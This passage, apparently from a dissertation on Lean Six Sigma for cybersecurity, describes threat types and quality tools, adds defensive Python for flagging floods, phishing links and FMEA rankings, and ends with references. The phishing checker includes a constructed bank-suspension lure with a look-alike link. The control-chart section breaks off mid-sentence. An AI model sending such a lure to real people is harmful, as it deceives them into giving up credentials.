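    are assumed values for the demonstration."""
    requests = sorted(requests)
    per_source = peak_per_source(requests, window)
    flooders = sorted(ip for ip, n in per_source.items() if n > per_source_limit)
    total = peak_total(requests, window)
    if flooders:
        verdict = "single-source flood"   # one connection is doing the flooding
    elif total > total_limit:
        verdict = "distributed flood"     # many sources, each under the per-source limit
    else:
        verdict = "normal"
    return verdict, flooders, total


def constructed_sample(scenario):
    """Constructed traffic records (time in seconds, source IP) standing in for
    an access log. Three legitimate clients each send one request per second."""
    reqs = [(t, ip) for ip in ("10.0.0.1", "10.0.0.2", "10.0.0.3") for t in range(30)]
    if scenario == "dos":
        # one attacker, 50 requests per second for 10 seconds
        reqs += [(5 + i / 50, "198.51.100.7") for i in range(500)]
    elif scenario == "ddos":
        # sixty bots, each only 5 requests per second for 10 seconds
        for b in range(60):
            reqs += [(5 + i / 5, "203.0.113.%d" % b) for i in range(50)]
    return reqs


if __name__ == "__main__":
    for scenario in ("normal", "dos", "ddos"):
        print(scenario, classify(constructed_sample(scenario)))
```

The per-source limit catches the single attacker, but every bot in the distributed case stays under it, which is why the combined count is needed as a second signal. Counting alone says nothing about which requests are worthless; that judgement needs content or behavioural checks beyond this example.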

Social Engineering attacks

These attacks target human psychological vulnerabilities. The typical social engineering attack is non-technical; it uses deception and manipulation to trick victims into inadvertently disclosing the company's sensitive information. This makes such attacks appealing to cyber criminals, as it is usually easier and faster to trick a victim into granting access to sensitive data than to break in.
Phishing is by far the most common type of social engineering attack. The attacker crafts a fraudulent email, instant message or text message disguised to appear to come from a legitimate, trusted source. Once opened by the victim, the message may, for example, urgently request sensitive information, or contain a link that leads to a spoofed malicious website or installs malware on the victim's system. Spear phishing, where the fraudulent message is crafted specifically for a particular person or company, is often seen in companies.[28]
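
Two of the phishing traits just described can be checked mechanically: a sender address whose domain does not match the organisation it claims to be, and a link whose visible text names one site while its destination is another. The example below is added here and is not from the original dissertation or the cited Digital Guardian article; the message, the look-alike domain and the trusted-domain list are constructed for the demonstration.

```python
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


# Visible link text that itself looks like a URL or a bare domain name.
_LOOKS_LIKE_URL = re.compile(r"^(?:https?://)?([A-Za-z0-9.-]+\.[A-Za-z]{2,})(?:/\S*)?$")


def _is_trusted(host, trusted_domains):
    return any(host == d or host.endswith("." + d) for d in trusted_domains)


def suspicious_links(html_body, trusted_domains):
    """Return [(href, text, reasons)] for links whose destination differs from
    the domain their visible text claims, or lies outside the trusted domains."""
    parser = _AnchorCollector()
    parser.feed(html_body)
    findings = []
    for href, text in parser.anchors:
        href_host = (urlparse(href).hostname or "").lower()
        reasons = []
        m = _LOOKS_LIKE_URL.match(text)
        if m and m.group(1).lower() != href_host:
            reasons.append("text shows %s but link goes to %s" % (m.group(1), href_host))
        if href_host and not _is_trusted(href_host, trusted_domains):
            reasons.append("destination %s is not a trusted domain" % href_host)
        if reasons:
            findings.append((href, text, reasons))
    return findings


def sender_domain_untrusted(from_header, trusted_domains):
    """True when the From: address domain is outside the trusted domains,
    whatever the display name claims (the 'disguised source' above)."""
    _, addr = parseaddr(from_header)
    domain = addr.rpartition("@")[2].lower()
    return not _is_trusted(domain, trusted_domains)


# Constructed phishing message: the visible link claims bank.example.com but
# the href's host is a look-alike registered under login-verify.net.
SAMPLE_FROM = "Example Bank Security <alerts@bank-example-security.net>"
SAMPLE_BODY = """<p>Your account will be suspended in 24 hours.</p>
<p>Sign in now at <a href="http://bank.example.com.login-verify.net/">https://bank.example.com/login</a></p>
<p>Questions? See our <a href="https://bank.example.com/help">help pages</a>.</p>"""
TRUSTED = {"bank.example.com"}   # assumed list maintained by the company

if __name__ == "__main__":
    print("sender untrusted:", sender_domain_untrusted(SAMPLE_FROM, TRUSTED))
    for href, text, reasons in suspicious_links(SAMPLE_BODY, TRUSTED):
        print(href, "|", text, "|", "; ".join(reasons))
```

The look-alike host begins with the trusted name, which is exactly why the check compares the whole registered host (equal, or a subdomain of a trusted domain) rather than looking for the trusted name anywhere in the string. Both checks are heuristics; they flag the message for a person or a filter to act on, they do not prove intent.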

Malicious insiders
As with social engineering, the malicious insider is a human vulnerability. A malicious insider is somebody with a professional link to the company who is determined to harm it. The malicious insider has some means of accessing and acquiring sensitive information (such as competitive intelligence) within the company, and may also be able to erase evidence of their activities. The stolen information is usually used out of malice or for personal financial gain. Malicious insiders can be current employees, past employees, contractors or even vendors.[29]

Stolen devices

The final human cyber security threat is stolen devices. With the immense rise of smart mobile devices in recent years, many companies now provide their employees with company devices such as smartphones and tablets. While this has numerous advantages, it also introduces many new security threats, and many companies have yet to adopt a comprehensive BYOD strategy to ensure the approach is implemented securely. While employees use their devices within the company they are protected by the company's security procedures, but when an employee works outside the workplace the device is at a higher risk of theft.
As the size of mobile devices has decreased, the likelihood of their being lost or stolen has increased; this leaves companies vulnerable to cyber attacks and makes their sensitive data more accessible. For this reason many cyber criminals will organise thefts of company devices to gain access to company data, as it is usually far easier to steal somebody's device than to hack into their company.[30]

Malware

The word malware is a combination of the words malicious and software. It is a broad term that refers to a range of different types of malicious software; all of them have been developed to carry out an unwelcome intrusion on a victim's device, usually with malicious intent. Once a device has been infected with malware, the attacker's malicious code executes on that device.
Different types of malware are often used in conjunction with each other for highly effective and efficient attacks.
Some of the common malware types can be seen below.

  • Viruses
    Computer viruses are one of the most common types of malware. A virus is a malicious program designed by cyber criminals to run its malicious code once executed on a victim's device. A virus usually spreads from device to device by attaching itself to legitimate files, where it can sit relatively inconspicuously on the victim's device until the moment of execution, after which it multiplies rapidly by replicating itself.
  • Worms
    A computer worm is a malicious program designed to penetrate its victim's device via the network connection. Worms are similar to viruses in that they multiply by replicating themselves, but differ in that they spread from device to device by sending copies of themselves over the network to seek out other unsuspecting victims on the same network. Once a victim is found, the worm usually runs in the background of the device without needing to be executed by the user.
    Worms can modify and delete files, and even inject additional malware onto the computer.
  •  Trojans
    A Trojan is a type of malware designed to hide its true intent by disguising itself as a harmless download or hiding in an email attachment. Unlike viruses and worms, a Trojan does not replicate itself; instead, once activated on a victim's device it usually creates a backdoor, giving the attacker access to and control of the device.

    Many of these types of malware are also used to download or inject other malware onto victims' devices. Some of the other malware types that are dropped onto the infected device can be seen below.

  • Ransomware – Locks the user out of the device until a fee has been paid to unlock it.
  • Spyware – Runs secretly on the device, monitoring and recording information such as browsing details and other personal information, which is then sent to a third party.
  • Scareware – Scares the user into believing there are problems with the device, then tricks them into purchasing bogus software to repair the non-existent problems.
  • Adware – Usually unwanted but not malicious; software that displays advertisements. Some adware also tracks browsing information, which makes it a type of spyware.
Botnets

A botnet is a collection of internet-connected devices under the remote control of a cyber criminal. The attacker seizes control of each unknowing victim's device by infecting it with other malware (often a Trojan) that permits access to and control of the device. Once in control of many devices, the attacker can send commands simultaneously to all the devices in the botnet, which gives the attacker the ability to perform many different malicious acts, such as a distributed denial-of-service (DDoS) attack.[31]

4.1.2 Applicable Tools

Below is a definition of each of the Lean Six Sigma tools used in this DMAIC project.

Project Charter

The project charter is usually the first step of a DMAIC project and therefore belongs to the define phase. It gives the project direction and a sense of purpose. It is designed to be clear and precise while remaining short, and it defines the scope of the project by:

  • Outlining objectives and deliverables
  • Setting targets, goals and what the timeline is to complete them
  • Justifying the need for the project
  • Specifying the boundaries
  • Identifying the constraints[32]

Bar chart

The bar chart is a common Lean Six Sigma tool for understanding what the current data shows. It visually summarises the differences between groups of measured data, and presenting the data this way increases the chance of detecting trends, variation and other anomalies in the data.[33]

Run chart

The run chart (also known as a time series chart) is a simple but powerful tool used to display the output or performance of a process over a specified period of time, in order to identify any patterns, trends or behaviours in the process. It indicates whether the process is changing over time by revealing inconsistencies or variation within it.[34]

5 why analysis

The 5 whys analysis is a simple tool normally used in the analyse phase to find the root cause of a failure or problem. By asking "why" repeatedly (on average it takes about five iterations to reach the root cause) it digs past the symptoms of the problem to its actual root cause. As well as establishing why the problem occurred, analysing each cause also shows how it occurred.
The analysis is carried out simply by asking why the problem occurred; if the answer is not the root cause, ask why that cause occurred, and keep asking until the root cause is agreed upon.
Without identifying the actual root cause, the problem is only treated rather than eliminated, and it will usually recur.
The 5 whys analysis can be used on its own or together with a fishbone diagram: once the primary and secondary causes have been placed on the fishbone, the 5 whys can be used to drill down further to the root causes.[35]

Fishbone Diagram

The fishbone diagram (also known as a cause-and-effect diagram) graphically displays the possible root causes of a problem or effect. It applies to effects that are positive (a desired outcome) as well as negative (an undesired outcome).
The diagram is drawn to resemble the side view of a fish skeleton: the problem or effect is placed where the head would be, the spine leads from it, and the large bones branching off the spine are labelled with four to six broad categories of cause. The smaller bones attached to each large bone are where the specific causes are placed, often identified through other tools such as brainstorming.[36]

Brainstorming

Brainstorming is a group exercise for generating a large number of ideas or solutions to a problem in a relatively short period of time. It can be used in any phase of DMAIC, but is usually most beneficial when combined with other tools such as failure mode and effects analysis (FMEA).
Before a brainstorming session begins, the facilitator sets ground rules designed to ensure all participants feel free to express their opinions and ideas without fear of ridicule or criticism from colleagues. Participants are encouraged to build upon each other's ideas, with quantity of ideas preferred over quality.
To get people in the right mindset and get words flowing at the start of the session, a word game such as word association is played; once people have warmed up, a lead question related to the problem is introduced.
A brainstorming session in full swing is highly energised and moves rapidly. Other tools such as affinity diagrams are often used at this point to organise the ideas so the group can plan ahead while new ideas are still being collected; the ideas are usually prioritised at a later stage.[37]

Affinity diagram

An affinity diagram (also known as KJ analysis) is an analytical tool that organises a large amount of data (ideas, issues, solutions, problems) into subgroups that share a common theme or relationship, sorted by the facilitator and participants. It is often used during a brainstorming session: each participant writes their ideas on post-it notes, which are handed to the facilitator and stuck on a wall in their respective groups. The affinity diagram can also be used after a brainstorming session to sort out the overwhelming, chaotic output the session produced.[38]

Failure Mode Effects Analysis (FMEA)

An FMEA is a tool often used in the analyse phase and is considered by many to be the ideal Six Sigma tool. Used together with brainstorming, it predicts and anticipates the most likely failures in a process, prioritises each failure by its impact, and then attempts to determine the most suitable preventive measures and/or corrective actions for them.
An FMEA begins by rating each failure on a compiled list, on a scale of 1 to 10, for severity (not severe to extremely severe), occurrence (rare to frequent) and detection (easily detected to highly unlikely to be detected).
A risk priority number between 1 and 1,000 is then calculated for each failure with the formula RPN = severity × occurrence × detection. The failures are prioritised in descending order of RPN; the failure with the highest RPN is addressed first when determining preventive measures and/or corrective actions. Once the chosen actions have been implemented, the FMEA should be reassessed to determine the effectiveness of the changes. A RACI matrix can be used to assign responsibility for implementing the preventive measures and/or corrective actions after the FMEA.[39]

RACI Matrix

The RACI matrix is a tool for the human element of a project; companies use it to assign, balance and clearly identify the tasks of a specific person or group in the project.
The matrix lists the participants in the project and the tasks to be completed. To identify each person's relationship to a task, one of the letters R, A, C or I is assigned to the person for that task. The letters mean the following:

  • Responsible: participates in the task to the best of their abilities.
  • Accountable: accountable for the results of the task.
  • Consulted: has particular expertise that they can contribute if needed.
  • Informed: people who are in some way affected by the results of the task and therefore need to be kept informed of any decisions or changes made, without actively participating in those decisions or changes.

The accountable role is usually assigned to the person supervising the project. It should be assigned to only one person, as duplication causes confusion, resulting in delayed or incomplete tasks and wasted resources.[40]

Pareto Analysis

Pareto analysis is a simple, effective and commonly used tool for prioritising problems. It is based on the 80/20 principle, which estimates that 80% of problems come from 20% of causes. It works by measuring the causes or effects of a problem (for example by frequency or cost) with the goal of prioritising improvement of the causes or effects with the greatest impact.
The 80/20 split often does not hold exactly, and other prioritisation tools such as FMEA are used alongside it.
The Pareto chart visually summarises the causes or effects by their impact, in descending order from left to right, so it can be seen which should be prioritised over others. To confirm whether the 80/20 principle applies to the problem, a cumulative percentage of the total is overlaid as a line graph.[41]
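
The FMEA ranking (RPN = severity × occurrence × detection, descending) and the Pareto cumulative-percentage line are two steps of the same prioritisation, so one added example covers both. It is not from the original dissertation or the cited iSixSigma and MindTools pages; the five failure modes are drawn from the threat list in this chapter, but their ratings are assumed for the demonstration, not measured.

```python
from dataclasses import dataclass


@dataclass
class FailureMode:
    """One row of an FMEA worksheet; ratings use the 1 to 10 scales described
    above, where a higher value is worse for all three."""
    name: str
    severity: int
    occurrence: int
    detection: int

    def rpn(self) -> int:
        for rating in (self.severity, self.occurrence, self.detection):
            if not 1 <= rating <= 10:
                raise ValueError("FMEA ratings must be between 1 and 10")
        return self.severity * self.occurrence * self.detection


def rank_by_rpn(modes):
    """Failure modes in descending RPN order: the first entry is addressed first."""
    return sorted(modes, key=lambda m: m.rpn(), reverse=True)


def pareto(items, cutoff=0.8):
    """items: (label, impact) pairs. Returns the rows of a Pareto chart as
    (label, impact, cumulative share) in descending impact order, plus the
    'vital few' labels that together account for the first `cutoff` of the
    total impact, i.e. up to where the cumulative line crosses 80%."""
    ordered = sorted(items, key=lambda x: x[1], reverse=True)
    total = sum(impact for _, impact in ordered)
    rows, vital, running, previous_share = [], [], 0, 0.0
    for label, impact in ordered:
        running += impact
        share = running / total
        rows.append((label, impact, round(share, 3)))
        if previous_share < cutoff:   # cumulative line had not yet reached the cutoff
            vital.append(label)
        previous_share = share
    return rows, vital


# Constructed worksheet: the ratings are illustrative, not measured values.
SAMPLE_FMEA = [
    FailureMode("SQL injection in customer web app", severity=9, occurrence=6, detection=5),
    FailureMode("Phishing email reaches user inbox", severity=7, occurrence=9, detection=4),
    FailureMode("Unencrypted laptop stolen off-site", severity=8, occurrence=3, detection=2),
    FailureMode("Insider copies customer records", severity=9, occurrence=2, detection=8),
    FailureMode("DDoS takes public site offline", severity=6, occurrence=4, detection=1),
]

if __name__ == "__main__":
    for mode in rank_by_rpn(SAMPLE_FMEA):
        print("%4d  %s" % (mode.rpn(), mode.name))
    rows, vital = pareto([(m.name, m.rpn()) for m in SAMPLE_FMEA])
    for label, impact, share in rows:
        print("%-36s %4d  cumulative %5.1f%%" % (label, impact, share * 100))
    print("vital few:", vital)
```

With these ratings the top three failure modes carry about 90% of the total RPN, so the cumulative line crosses 80% at the third bar and those three are the vital few to address first. Note that detection is rated the wrong way round from intuition (hard to detect scores high), which is what pushes the insider case above the stolen laptop despite its lower occurrence.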

Control Chart
A control chart is a visual tool often used in the control phase to help determine whether a process is in statistical control. It shows the level of variation, shifts and trends within the process in the same way a run chart does, but where a run chart does not indicate when the process is out of control, a control chart adds pre-calculated upper and lower control limits that show when the process is not in control. A control chart can therefore be seen as an extension of the run chart.
The control chart limits are calculated by first taking the mean of the sample, which is used to estimate the standard deviation with the following equation:

[3] “Toyota Production System,” Toyota Australia. [Online]. Available: http://www.toyota.com.au/toyota/company/operations/toyota-production-system. [Accessed: 18-May-2017].

[4] S.-Y. Lai, C.-H. Tsai, L.-Y. Wei, R.-K. Li, M.-J. Lu, and others, “The dilemma of Toyota Production System implementation: a case study of Taiwan machine tool industries,” Int. J. Acad. Res. Account. Finance Manag. Sci., vol. 5, no. 1, pp. 1–12, 2015.

[5] J. P. Womack, D. T. Jones, and D. Roos, Machine that changed the world. Simon and Schuster, 1990.

[6] “The Seven Wastes | 7 Mudas,” Lean Manufacturing Tools. [Online]. Available: http://leanmanufacturingtools.org/77/the-seven-wastes-7-mudas/. [Accessed: 09-Dec-2016].

[7] “Top 25 Lean Manufacturing Tools.” [Online]. Available: http://www.leanproduction.com/top-25-lean-tools.html. [Accessed: 18-May-2017].

[8] J. P. Womack and D. T. Jones, Lean thinking: banish waste and create wealth in your corporation, 1st Free Press ed.,  And updated. New York: Free Press, 2003.

[9] “Lean Thinking | Lean Principles | Lean Manufacturing Tools.” [Online]. Available: http://leanmanufacturingtools.org/39/lean-thinking-lean-principles/. [Accessed: 18-May-2017].

[10] “The History of Six Sigma.” [Online]. Available: https://www.isixsigma.com/new-to-six-sigma/history/history-six-sigma/. [Accessed: 18-May-2017].

[11] “Motorola’s Six Sigma Journey: In pursuit of perfection | Procurement | Supply Chain Digital.” [Online]. Available: http://www.supplychaindigital.com/procurement/motorolas-six-sigma-journey-pursuit-perfection. [Accessed: 18-May-2017].

[12] “What Is Six Sigma?” [Online]. Available: https://www.isixsigma.com/new-to-six-sigma/getting-started/what-six-sigma/. [Accessed: 18-May-2017].

[13] “The meaning of Six Sigma.” [Online]. Available: http://www.six-sigma-material.com/Six-Sigma.html. [Accessed: 18-May-2017].

[14] “Define, Measure, Analyze, Improve, Control (DMAIC Approach) | ASQ.” [Online]. Available: http://asq.org/learn-about-quality/six-sigma/overview/dmaic.html. [Accessed: 18-May-2017].

[15] “What Is DMAIC?” [Online]. Available: https://www.isixsigma.com/methodology/dmaic-methodology/what-dmaic/. [Accessed: 18-May-2017].

[16] “DMAIC Process, a great Six Sigma problem solving tool | ToolsHero.” [Online]. Available: https://www.toolshero.com/problem-solving/dmaic-process/. [Accessed: 18-May-2017].

[17] “New to Lean Six Sigma?” [Online]. Available: https://www.moresteam.com/new-to-lean-six-sigma.cfm. [Accessed: 18-May-2017].

[18] “Six Sigma Definition – What is Lean Six Sigma? | ASQ.” [Online]. Available: http://asq.org/learn-about-quality/six-sigma/overview/overview.html. [Accessed: 18-May-2017].

[19] “About ISO27k.” [Online]. Available: http://www.iso27001security.com/html/iso27000.html. [Accessed: 18-May-2017].

[20] “Planning for and Implementing ISO 27001.” [Online]. Available: https://www.isaca.org/Journal/archives/2011/Volume-4/Pages/Planning-for-and-Implementing-ISO27001.aspx. [Accessed: 18-May-2017].

[21] “ISO/IEC 27001 certification standard.” [Online]. Available: http://www.iso27001security.com/html/27001.html. [Accessed: 18-May-2017].

[22] “ISO 27001 | Guide to ISO 27001 Standards Information | NQA.” [Online]. Available: https://www.nqa.com/en-gb/resources/blog/december-2015/your-complete-guide-to-the-iso-27001-standard. [Accessed: 18-May-2017].

[23] “Lean Security Operations | The Security Minute.” [Online]. Available: http://www.thesecurityminute.com/lean-security-operations. [Accessed: 18-May-2017].

[24] F. Scholl, "A Lean Approach to Information Security," New Journal.

[25] D. Wright, "Getting Lean on Security Operations," in Lean Security, 2008.

[26] “Five common Web application vulnerabilities | Symantec Connect Community.” [Online]. Available: https://www.symantec.com/connect/articles/five-common-web-application-vulnerabilities. [Accessed: 18-May-2017].

[27] “Distributed Denial of Service Attacks – The Internet Protocol Journal – Volume 7, Number 4 – Cisco.” [Online]. Available: http://www.cisco.com/c/en/us/about/press/internet-protocol-journal/back-issues/table-contents-30/dos-attacks.html. [Accessed: 18-May-2017].

[28] “Social Engineering Attacks: Common Techniques & How to Prevent an Attack | Digital Guardian.” [Online]. Available: https://digitalguardian.com/blog/social-engineering-attacks-common-techniques-how-prevent-attack. [Accessed: 18-May-2017].

[29] “Malicious Insider Threats Greater than Most IT Executives Think.” [Online]. Available: http://www.computereconomics.com/article.cfm?id=1537. [Accessed: 18-May-2017].

[30] “The Security Risks of Lost and Stolen Devices,” ITSPmagazine | Cybersecurity & Infosec News. [Online]. Available: http://itspmagazine.com/from-the-newsroom/the-security-risks-of-lost-and-stolen-devices. [Accessed: 18-May-2017].

[31] “Common Malware Types: Cybersecurity 101,” Veracode, 12-Oct-2012. [Online]. Available: https://www.veracode.com/blog/2012/10/common-malware-types-cybersecurity-101. [Accessed: 18-May-2017].

[32] “Six Sigma Project Charter.” [Online]. Available: https://www.isixsigma.com/tools-templates/project-charter/six-sigma-project-charter/. [Accessed: 18-May-2017].

[33] “Six Sigma Tools: Bar Charts.” [Online]. Available: http://www.sixsigmaonline.org/six-sigma-training-certification-information/six-sigma-tools-bar-charts/. [Accessed: 18-May-2017].

[34] “Run Charts: A Simple and Powerful Tool for Process Improvement.” [Online]. Available: https://www.isixsigma.com/tools-templates/control-charts/run-charts-a-simple-and-powerful-tool-for-process-improvement/. [Accessed: 18-May-2017].

[35] “Determine The Root Cause: 5 Whys.” [Online]. Available: https://www.isixsigma.com/tools-templates/cause-effect/determine-root-cause-5-whys/. [Accessed: 18-May-2017].

[36] “The Cause and Effect (a.k.a. Fishbone) Diagram.” [Online]. Available: https://www.isixsigma.com/tools-templates/cause-effect/cause-and-effect-aka-fishbone-diagram/. [Accessed: 18-May-2017].

[37] “Follow Brainstorming Basics to Generate New Ideas.” [Online]. Available: https://www.isixsigma.com/tools-templates/brainstorming/follow-brainstorming-basics-generate-new-ideas/. [Accessed: 18-May-2017].

[38] “An Affinity for Organized Thinking: A Diagram With Many Uses | iSixSigma.” [Online]. Available: https://www.isixsigma.com/tools-templates/affinity-diagram-kj-analysis/an-affinity-for-organized-thinking-a-diagram-with-many-uses/. [Accessed: 18-May-2017].

[39] “Quick Guide to Failure Mode and Effects Analysis.” [Online]. Available: https://www.isixsigma.com/tools-templates/fmea/quick-guide-failure-mode-and-effects-analysis/. [Accessed: 18-May-2017].

[40] “Balancing Roles and Responsibilities in Six Sigma.” [Online]. Available: https://www.isixsigma.com/new-to-six-sigma/roles-responsibilities/balancing-roles-and-responsibilities-six-sigma/. [Accessed: 18-May-2017].

[41] “Pareto Analysis – Decision-Making Skills Training from MindTools.com.” [Online]. Available: https://www.mindtools.com/pages/article/newTED_01.htm. [Accessed: 18-May-2017].

[42] “Control Chart,” Six Sigma Study Guide, 17-Apr-2014. [Online]. Available: http://sixsigmastudyguide.com/control-chart/. [Accessed: 18-May-2017].

[43] “X-Y Matrix.” [Online]. Available: http://www.whatissixsigma.net/x-y-matrix/. [Accessed: 18-May-2017].

[44] “VSM Value Stream Mapping | Lean Manufacturing Tools.” [Online]. Available: http://leanmanufacturingtools.org/549/vsm-value-stream-mapping/. [Accessed: 18-May-2017].

[45] "Scatter Plot | iSixSigma." [Online].

[46] “Scatter Diagram,” Six Sigma Daily. [Online]. Available: http://www.sixsigmadaily.com/scatter-diagram/. [Accessed: 18-May-2017].

[47] “Kaizen Creates a Culture of Continuous Improvement.” [Online]. Available: http://www.leanproduction.com/kaizen.html. [Accessed: 18-May-2017].

[48] “Andon – GoLeanSixSigma.com.” [Online]. Available: https://goleansixsigma.com/andon/. [Accessed: 18-May-2017].

[49] “Kanban | iSixSigma.” [Online]. Available: https://www.isixsigma.com/dictionary/kanban/. [Accessed: 18-May-2017].

[50] “5S.” [Online]. Available: http://www.six-sigma-material.com/5S.html. [Accessed: 18-May-2017].

[51] “Poka-Yoke – Six Sigma Terminology.” [Online]. Available: http://www.sixsigmadaily.com/poka-yoke/. [Accessed: 18-May-2017].

[52] “The importance of a 15-minute daily huddle with your team. ~ The Lean Leader.” [Online]. Available: http://www.leanleader.org/2015/05/the-importance-of-15-minute-daily.html. [Accessed: 18-May-2017].

[53] “An Effective Six Sigma Control Plan.” [Online]. Available: http://www.sixsigmadaily.com/creating-effective-six-sigma-control-plan/. [Accessed: 18-May-2017].

[54] “60% of small companies that suffer a cyber attack are out of business within six months. – The Denver Post.” [Online]. Available: http://www.denverpost.com/2016/10/23/small-companies-cyber-attack-out-of-business/. [Accessed: 18-May-2017].
